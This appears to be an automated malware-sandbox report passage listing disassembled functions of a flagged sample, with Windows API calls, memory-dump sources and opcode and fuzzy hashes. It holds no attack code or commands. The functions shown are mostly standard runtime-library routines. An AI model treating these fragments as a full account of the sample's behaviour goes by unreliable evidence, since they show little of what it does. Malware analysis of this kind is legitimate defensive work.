Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0216B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0216BCF4,?,00000000), ref: 0216BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0216BCF4,?,00000000), ref: 0216BA97
GetACP.KERNEL32(?,?,0216BCF4,?,00000000), ref: 0216BAAC

Strings

OCP, xrefs: 0216BA29
ACP, xrefs: 0216B9F3

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 769442fa06ebd0dfc15835714b9e66c246bb6af26474c15bac4ff47e39ace8e9
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 6621A132688104AAE7348F54D909BBF73A6EB40E5CB578465E91AEB204F733DB60C390

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0216BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

Part of subcall function 02162141: _free.LIBCMT ref: 021621A0
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0216BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0216BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0216BD1F
GetLocaleInfoW.KERNEL32(?,00001001,02160A1C,00000040,?,02160B3C,00000055,00000000,?,?,00000055,00000000), ref: 0216BD67
GetLocaleInfoW.KERNEL32(?,00001002,02160A9C,00000040), ref: 0216BD86

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: fc337b4f9198bbed35f1395ef7375a4f9ec0d845d001f03694d3742f34f24093
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: DF51B471944209AFDB20DFA5DC48ABE77BAFF14708F050429E914F7290EB719B21CB61

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0216B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02160A23,?,?,?,?,0216047A,?,00000004), ref: 0216B353
_wcschr.LIBVCRUNTIME ref: 0216B3E3
_wcschr.LIBVCRUNTIME ref: 0216B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02160A23,00000000,02160B43), ref: 0216B494

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: e261ac653fd04013002e5e7dd0f7027bdb4e144a9d0f15130fc402924658b6ff
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: 3861EB71684206AED724AB74CC49BBF77ADEF04718F14446AED05E7580FB74E660CB90

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 0215A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0213DAD7), ref: 0215A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0213DAD7), ref: 0215A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0213DAD7), ref: 0215A749

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 15d62e8ad4746ad903c45c763216af2fd9f7c6c06c8d1511e59986d73f88d3ca
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: 0F31C67494122CDBCB21DF64D98879CBBB8BF08710F5042EAE81CA7250EB349B858F44

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 021600C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0216009C,00000000,00457970,0000000C,021601F3,00000000,00000002,00000000), ref: 021600E7
TerminateProcess.KERNEL32(00000000,?,0216009C,00000000,00457970,0000000C,021601F3,00000000,00000002,00000000), ref: 021600EE
ExitProcess.KERNEL32 ref: 02160100

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: e617420217a061d3355adf6688a0a6f97df09da860b7bb21dbceb88e39cf52c2
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: FAE0B636081148AFCF116F58DE0CA6D3B6AFB4AB86B504028FD058B131CB36DA62DA44

Function 0213092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0213095F
GetProcAddress., xrefs: 021309DC, 021309DF, 021309E4
l, xrefs: 02130966

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3836c2c0c9d7d0588d79a54d7fb2a89bb352c49fe921cc1f55db2b8726cc0980
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 51314CB6940609DFDB11CF99C880AAEBBF6FF48324F15404AD445AB310D771EA45CFA4

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 02168C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 02168D23

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: 918eb951b151b87f287f8a31efc7ac98cbcb4e646958375b79c203704a057691
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: B5412572940219AECB209FB9CC8CEBF77B9EB80714F1142A9F905D7180E3319D95CB60

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0215ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 25d997455e9e243384eb3aefa21a8eb485599b36045bdc3bbe66907fed793e9d
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 46021D71E40229DFDF14CFA9C8906ADB7F2EF49314F2541AAD929E7744D731AA42CB80

Function 02132605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0213262C
PostQuitMessage.USER32(00000000), ref: 021327CA

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 61949b98683594303179dbb8af7d2183f272a348e5d4cf22be11206f7ce53c5e
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 1F413E25A64384A5E731FFA5BC45B2533B1FF64722F10252BD528CB2B2E3B28940C75E

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 02166F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02166F21,?,?,00000008,?,?,0216F3E2,00000000), ref: 02167153

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 15c3c62dcb009ee3e4d09568d904d53c3bfd418b3d6bc34bd72036966cfaefaa
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 89B14F31550608DFD719CF28C48AB69BBE1FF45368F258659E8A9CF2E1C335D9A2CB40

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0216B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

Part of subcall function 02162141: _free.LIBCMT ref: 021621A0
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0216B900

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: f88a336824c1bf65b71b16960c6e499be88eecc91e7e45a48bc13ee6de98ade0
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: 242183B299821A9FEF249F24DC49BBE77ADEB05318F10017AED01E6150EB359A64CB50

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0216B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02160A1C,?,0216BC89,00000000,?,?,?), ref: 0216B5A6

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 4a461a6e44596c6d4555d2d227529f47aad74c9ff8af14ac484022642a4061cd
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 0711483B2047019FDB18AF39C8A57BEBB92FF84318B14482CDA4697A40E371B612CB40

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
